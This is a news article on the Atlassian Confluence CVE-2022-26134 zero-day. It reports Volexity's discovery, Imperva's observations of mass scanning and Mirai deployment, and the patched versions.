By Staff Writer.
Australian software giant Atlassian has scrambled to fix a critical unauthenticated remote code execution vulnerability that has impacted all supported versions of their Confluence Server and Data Center. Washington, DC-based cyber security firm Volexity discovered the vulnerability early last week.
Officially tagged CVE-2022-26134, the vulnerability potentially allows a malicious actor to install malware remotely or otherwise control the affected device without authentication. This is the second major Confluence vulnerability attackers have exploited in under 12 months.
Volexity uncovered the latest threat while investigating suspicious activity on two Internet-facing web servers belonging to a customer that used Atlassian Confluence Server software. Volexity detected suspicious activity on the hosts, including JSP webshells writing to disk.
The Volexity investigation determined the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The cybersecurity company was then able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.
Confluence’s popular web-based corporate collaboration software is used by more than 75,000 customers worldwide. Atlassian describes the software as “protected by privacy controls and data encryption, and meet industry-verified compliance standards.”
However, all supported versions of Confluence Server and Data Center are affected by the CVE-2022-26134 vulnerability. Fixed Confluence versions 7.4.17; 7.13.7; 7.14.3; 7.15.2; 7.16.4; 7.17.4; 7.18.1; and Confluence sites accessed via an atlassian.net domain are unaffected.
“Volexity believes the attacker launched a single exploit attempt at each of the Confluence Server systems, which in turn loaded a malicious class file in memory,” says a blog post detailing Volexity’s investigation.
“This allowed the attacker to effectively have a webshell they could interact with through subsequent requests. The benefit of such an attack allowed the attacker to not have to continuously re-exploit the server and to execute commands without writing a backdoor file to disk.”
California-based cybersecurity company Imperva Threat Research has observed over 680,000 attack attempts since June 3, with attack sources coming from nearly four thousand unique IPs (the largest percentage of targets are located in Chile). Impervia adds that payload analysis shows that most attacks are scanning attempts to find vulnerable servers. They’ve also observed attempts to deploy a malicious script and exfiltrate sensitive data.
Impervia says attackers are adopting two primary scanning approaches; invoking Java runtime exec function to run the command line program nslookup that calls an external server (owned by the attacker), or invoking Confluence GeneralUtil setCookie function to set a unique cookie name and value.
The cybersecurity company also notes the destructive script is deploying in one of two ways; persistent gains through the modification of the infected server crontab, or downloading an executable file, running it, and deleting the instance from the file’s system. The malicious file’s goal is to infect the victim server with the Mirai botnet.
The Australian Cyber Security Centre (ACSC) says it is aware of malicious actors successfully exploiting the vulnerability before it became public but remains unaware of any successful exploitation within Australia.
Atlassian has released a fix for versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 of Confluence. They also have a temporary workaround if customers are unable to upgrade immediately.
